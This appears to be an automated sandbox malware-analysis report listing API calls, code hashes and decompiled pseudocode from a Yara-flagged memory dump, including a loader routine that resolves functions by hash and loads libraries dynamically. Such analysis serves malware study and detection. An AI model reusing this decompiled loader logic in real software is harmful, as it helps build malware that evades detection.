                                                      0x0041a015
                                                      0x0041a019

                                                      APIs
                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: 2MA$2MA
                                                      • API String ID: 2738559852-947276439
                                                      • Opcode ID: 63589ec3e1e046129191fc5836d81b158da8997fc4b32e850e583c0b6458edae
                                                      • Instruction ID: 98ae421c64e618cb2b09f520dca615dbc4e8add42dd12773a1101eeed08372ea
                                                      • Opcode Fuzzy Hash: 63589ec3e1e046129191fc5836d81b158da8997fc4b32e850e583c0b6458edae
                                                      • Instruction Fuzzy Hash: 54F0E2B2200108AFCB14DF99DC91EEB77A9AF8C354F158249BA4DA7241C630E812CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419FD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: 2MA$2MA
                                                      • API String ID: 2738559852-947276439
                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction ID: 629a420ec24cda59f7740677f87fbeb895876e778ce4a2e4436109007655ca88
                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction Fuzzy Hash: 4BF0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630F851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419F20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: wKA
                                                      • API String ID: 823142352-3165208591
                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction ID: 918681b749d1ebc684007e4c1563b975095bc633172356dce6c62aeb4b4fe286
                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction Fuzzy Hash: 2DF0B2B2205208ABCB08CF89DC95EEB77ADAF8C754F158249BA0D97241C630F851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C810( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CC30(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CEB0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B060(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                      0x0040acdc
                                                      0x0040acdf
                                                      0x0040ace4
                                                      0x0040ace9
                                                      0x0040acf3
                                                      0x0040acf8
                                                      0x0040acfb
                                                      0x0040acfd
                                                      0x0040ad05
                                                      0x0040ad0a
                                                      0x0040ad0a
                                                      0x0040ad11
                                                      0x0040ad19
                                                      0x0040ad1c
                                                      0x0040ad1e
                                                      0x0040ad32
                                                      0x00000000
                                                      0x0040ad34
                                                      0x0040ad3a
                                                      0x0040acee
                                                      0x0040acee
                                                      0x0040acee

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                      • Instruction ID: f2ae6e5e7806921c9eae43ef0be609edf832a6aa20f0d9e7e2e66c408c20611a
                                                      • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                      • Instruction Fuzzy Hash: E40152B5D4020DABDB10DAE1DC82FDEB7789B14308F0041AAA908A7281F634EB54CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction ID: b7acdae8d3035396bf3a6cabd8be047a375e4a620bd0b44aa6ca3e6eeb15d15e
                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction Fuzzy Hash: 35F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F810CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: b02a98072ae76633dfac5978dec5414655e95fa3032167deae29744f36717898
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: B7D01776200214ABD710EB99DC85FE77BADEF48764F15449ABA189B242C530FA1087E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7a840c72da028147af10cbc7b3acc407d982920d0927bc8a307ae90b0f345b26
                                                      • Instruction ID: 79bfb01dda80238b58b22cfdabe9816f68e2e36efac01f065d6c790aa17fe767
                                                      • Opcode Fuzzy Hash: 7a840c72da028147af10cbc7b3acc407d982920d0927bc8a307ae90b0f345b26
                                                      • Instruction Fuzzy Hash: E99002B120500406D150719984047474005A7D4341F52C025A6054564EC6998DD5B6A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a71dab169c405e3026ff0082e042079728becc7b046c0105f458a44a468f4a8d
                                                      • Instruction ID: 692d4e9027130b635d80960ab71a131b92217d6fec7b8c8b75d790e598efbc57
                                                      • Opcode Fuzzy Hash: a71dab169c405e3026ff0082e042079728becc7b046c0105f458a44a468f4a8d
                                                      • Instruction Fuzzy Hash: 729002A134500446D11061998414B074005E7E5341F52C029E2054564DC659CC52B167
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 93862c761c16f5723d4f434f2fe1d8fea166b688e6d2dc26ca7dce802be9ce4d
                                                      • Instruction ID: 0daf39be8af24363e99b2e50f419793b5b4234a2f216ef81fa7c5e1af2ef847e
                                                      • Opcode Fuzzy Hash: 93862c761c16f5723d4f434f2fe1d8fea166b688e6d2dc26ca7dce802be9ce4d
                                                      • Instruction Fuzzy Hash: F390027120500417D121619985047074009A7D4281F92C426A1414568DD6968952F162
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 321fae458367e9be184f099e5dedf400821e63a3e69267b1bae76304ae609c2a
                                                      • Instruction ID: 2ebc8b6ba58e70170362992cd9c1066f9e0d399a7bdc0e420da48929e53eea4d
                                                      • Opcode Fuzzy Hash: 321fae458367e9be184f099e5dedf400821e63a3e69267b1bae76304ae609c2a
                                                      • Instruction Fuzzy Hash: 1F900261246041565555B19984046078006B7E4281792C026A2404960CC5669856F662
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 47449af7ebab8992bdfd7abdc2e313390985503f70b64f56a9c64040bd07dcc7
                                                      • Instruction ID: 7a66c694599a4da42799626b62d2572db962246eeb0c162d2e5ae0881427e0da
                                                      • Opcode Fuzzy Hash: 47449af7ebab8992bdfd7abdc2e313390985503f70b64f56a9c64040bd07dcc7
                                                      • Instruction Fuzzy Hash: CA90026160500506D11171998404717400AA7D4281F92C036A2014565ECA658992F172
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2d61c5fb151b320fb1002956d3e033294c845bb5784d743ef75edcc80a2380f5
                                                      • Instruction ID: 40c15c6c000b8c642820b464d391d426c63e9d0a9f2f8ae241a0cb09ddda78e6
                                                      • Opcode Fuzzy Hash: 2d61c5fb151b320fb1002956d3e033294c845bb5784d743ef75edcc80a2380f5
                                                      • Instruction Fuzzy Hash: 8690026121580046D21065A98C14B074005A7D4343F52C129A1144564CC9558861B562
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ca34a45756cd442ea7c5debef6f6e4dde616f2066c3d381045c18c693430b99b
                                                      • Instruction ID: 24d67dc8972e1af86650f1bc858031b173c65cbc7f6345431267b0e2890b1e53
                                                      • Opcode Fuzzy Hash: ca34a45756cd442ea7c5debef6f6e4dde616f2066c3d381045c18c693430b99b
                                                      • Instruction Fuzzy Hash: C290026160500046415071A9C844A078005BBE5251752C135A1988560DC5998865B6A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ceba40530cd5d0353b2e5c277cb7dddcf9c034b6b3ab401f5ae3312c446dfb2e
                                                      • Instruction ID: dbaca7f71cdd81e77ffc9a7170ee19cf26080f98205ae2c932267a697b9e5286
                                                      • Opcode Fuzzy Hash: ceba40530cd5d0353b2e5c277cb7dddcf9c034b6b3ab401f5ae3312c446dfb2e
                                                      • Instruction Fuzzy Hash: 2290027120540406D1106199881470B4005A7D4342F52C025A2154565DC6658851B5B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ea1f50b69f7228645a7b08d4e4fffe3a13df45c2f5b30a54090b1f87dd02931c
                                                      • Instruction ID: 1b087d1d7153a522c843f5565ab4d5450d4666402176500f13ae17aad2dfe818
                                                      • Opcode Fuzzy Hash: ea1f50b69f7228645a7b08d4e4fffe3a13df45c2f5b30a54090b1f87dd02931c
                                                      • Instruction Fuzzy Hash: 61900265215000070115A59947046074046A7D9391352C035F2005560CD6618861B162
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8b44800cf08f842f72fb88862ea1e98355898cf7a02b91902231cfd2f80c776a
                                                      • Instruction ID: cea4dc60a500dfe39ddc8953b8e86cb6b0b175eeab2777071d804bb8fac96a67
                                                      • Opcode Fuzzy Hash: 8b44800cf08f842f72fb88862ea1e98355898cf7a02b91902231cfd2f80c776a
                                                      • Instruction Fuzzy Hash: 269002A120600007411571998414717800AA7E4241B52C035E20045A0DC5658891B166
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2ac3c1b293b150bda08e4a6c74af9c1aa8baad8a8b4e3b3f3c9452a6600eb6f7
                                                      • Instruction ID: b341a3c666ac67f5af788d237351bc4df6f00836017523207956357224445602
                                                      • Opcode Fuzzy Hash: 2ac3c1b293b150bda08e4a6c74af9c1aa8baad8a8b4e3b3f3c9452a6600eb6f7
                                                      • Instruction Fuzzy Hash: C690027120500406D11065D994087474005A7E4341F52D025A6014565EC6A58891B172
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: dae1093fbabab72f156b4035f7c2c8f7b69adb93272ede57d229eb0783020815
                                                      • Instruction ID: 77f7eddeef793d05265ec9a3afb894fa0d1a2d962412dcd40444f5b8879a497d
                                                      • Opcode Fuzzy Hash: dae1093fbabab72f156b4035f7c2c8f7b69adb93272ede57d229eb0783020815
                                                      • Instruction Fuzzy Hash: FD90026130500007D150719994187078005F7E5341F52D025E1404564CD9558856B263
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 61cfa5152833f6dcd153ad34a5a5091083dcf2b76d512437eccc909b43aee28f
                                                      • Instruction ID: da2f0537cf7870cfab0db9fd2afd57d8c5c76e083032f621d088ec0bb2bb77ca
                                                      • Opcode Fuzzy Hash: 61cfa5152833f6dcd153ad34a5a5091083dcf2b76d512437eccc909b43aee28f
                                                      • Instruction Fuzzy Hash: 1190026921700006D1907199940870B4005A7D5242F92D429A1005568CC9558869B362
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ce6251f54ea21b6ddd0a41b17907de5cfc05d3a2fe8728864cac2302ec14bc52
                                                      • Instruction ID: fc0f5dbfe2df482bb7edcb43531fcdb69cf3bee580cfa39c7a80653badf34a8b
                                                      • Opcode Fuzzy Hash: ce6251f54ea21b6ddd0a41b17907de5cfc05d3a2fe8728864cac2302ec14bc52
                                                      • Instruction Fuzzy Hash: 4B90027120500806D1907199840474B4005A7D5341F92C029A1015664DCA558A59B7E2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0b35b4f96bf0ba9a11e6575ec53445d638f6ddf03b860ae2583c09f488c24d64
                                                      • Instruction ID: bdbca902dc2c13abc01a681ae1f705e44a8d47b8ef2ec35a15855cb11c25b1a6
                                                      • Opcode Fuzzy Hash: 0b35b4f96bf0ba9a11e6575ec53445d638f6ddf03b860ae2583c09f488c24d64
                                                      • Instruction Fuzzy Hash: 1890027120508806D1206199C40474B4005A7D4341F56C425A5414668DC6D58891B162
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05080370210f75a5a3fe5c957c173717e9568a082d75643143bc41a952943554
                                                      • Instruction ID: bf50d6615e3a851f47153e1852c589cd20b96e00f5eebf3b99f7dff6005f4db2
                                                      • Opcode Fuzzy Hash: 05080370210f75a5a3fe5c957c173717e9568a082d75643143bc41a952943554
                                                      • Instruction Fuzzy Hash: 6E213AB2D4020857CB15DA65AD42BEF73BCAB54304F04007FE949A7182F63CBE498BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A335, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID: AP
                                                      • API String ID: 3899507212-2793870665
                                                      • Opcode ID: 4a8b0577b9b24301b696b4e5fa6d7d3144279ef015267881eef89f7b109f2476
                                                      • Instruction ID: 1076840c15fafc18aa3bbe2f75d912114288870ddf56b1762e08443f1c6122f9
                                                      • Opcode Fuzzy Hash: 4a8b0577b9b24301b696b4e5fa6d7d3144279ef015267881eef89f7b109f2476
                                                      • Instruction Fuzzy Hash: 88115EB52002086BDB14DF99EC41EEB73AEEF88754F11855AFE0997241C634E9508BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A1F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: oLA
                                                      • API String ID: 1279760036-3789366272
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: 91a8afe93875cd4dd2c16ce4d21e80b139c6b658c845053945d21e38953d9919
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: F1E012B1200208ABDB14EF99DC41EA777ADAF88664F11855ABA085B242C630F910CBB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A264, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: oLA
                                                      • API String ID: 1279760036-3789366272
                                                      • Opcode ID: 532eaa0608e0094473740c2dcb7c679230d9bc9f6f2aaf4c671adacc83c51c91
                                                      • Instruction ID: bbe08171a93a16390c6bc0bda71e757294241d165aacd160c6bab85f2cd2fa2d
                                                      • Opcode Fuzzy Hash: 532eaa0608e0094473740c2dcb7c679230d9bc9f6f2aaf4c671adacc83c51c91
                                                      • Instruction Fuzzy Hash: 8CD012F52042449FD710EF64E8918DB7756AF88318730854AF95943702D739E92A9AB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 57%
                                                      			E004082E8(void* __ebx, signed int __ecx, void* __edx, intOrPtr _a4, long _a8) {
				char _v5;
				char _v67;
				char _v68;
				void* _t15;
				int _t16;
				void* _t23;
				long _t26;
				intOrPtr _t29;
				int _t31;
				unsigned char _t43;

				_t23 = __edx;
				asm("in eax, dx");
				 *__ecx =  *__ecx & __ecx;
				_v68 = 0;
				E0041BA20( &_v67, 0, 0x3f);
				_t4 = _t23 + 3;
				 *_t4 =  *(_t23 + 3) >> 0x51;
				_t43 =  *_t4;
				E0041C5C0();
				_t29 = _a4;
				_t15 = E0040ACC0(_t43, _t29 + 0x1c,  &_v68); // executed
				_t16 = E00414E10(_t29 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
				_t31 = _t16;
				if(_t31 != 0) {
					_push(0xec8b553c);
					_t26 = _a8;
					_t16 = PostThreadMessageW(_t26, 0x111, 0, 0); // executed
					_t45 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t31(_t26, 0x8003,  &_v5 + (E0040A450(_t45, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
				}
				return _t16;
			}













                                                      0x004082e8
                                                      0x004082e8
                                                      0x004082ec
                                                      0x004082ff
                                                      0x00408303
                                                      0x0040830a
                                                      0x0040830a
                                                      0x0040830a
                                                      0x0040830e
                                                      0x00408313
                                                      0x0040831e
                                                      0x0040832e
                                                      0x00408333
                                                      0x0040833a
                                                      0x0040833c
                                                      0x0040833d
                                                      0x0040834a
                                                      0x0040834c
                                                      0x0040834e
                                                      0x0040836b
                                                      0x0040836b
                                                      0x0040836d
                                                      0x00408372

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: e482b8d64fb8c1c2885c096074a8302312b0d7d1f6a39cad35b0b14d74912598
                                                      • Instruction ID: 06882739f9a915772d5d2506c266d8e25effbd3bf91bc082d9d351e7da04a69a
                                                      • Opcode Fuzzy Hash: e482b8d64fb8c1c2885c096074a8302312b0d7d1f6a39cad35b0b14d74912598
                                                      • Instruction Fuzzy Hash: 7F014932A802247BE720A6A08D43FFE776C6F41B04F04401EFB04BA1C1D6A8690547E9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E004082F0(void* __edx, intOrPtr _a4, long _a8) {
				char _v5;
				char _v67;
				char _v68;
				void* _t14;
				intOrPtr* _t15;
				int _t16;
				void* _t21;
				long _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				unsigned char _t33;

				_t21 = __edx;
				_v68 = 0;
				E0041BA20( &_v67, 0, 0x3f);
				_t4 = _t21 + 3;
				 *_t4 =  *(_t21 + 3) >> 0x51;
				_t33 =  *_t4;
				E0041C5C0();
				_t26 = _a4;
				_t14 = E0040ACC0(_t33, _t26 + 0x1c,  &_v68); // executed
				_t15 = E00414E10(_t26 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t28 = _t15;
				if(_t28 != 0) {
					_t24 = _a8;
					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t35 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t28(_t24, 0x8003,  &_v5 + (E0040A450(_t35, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
					return _t16;
				}
				return _t15;
			}














                                                      0x004082f0
                                                      0x004082ff
                                                      0x00408303
                                                      0x0040830a
                                                      0x0040830a
                                                      0x0040830a
                                                      0x0040830e
                                                      0x00408313
                                                      0x0040831e
                                                      0x0040832e
                                                      0x00408333
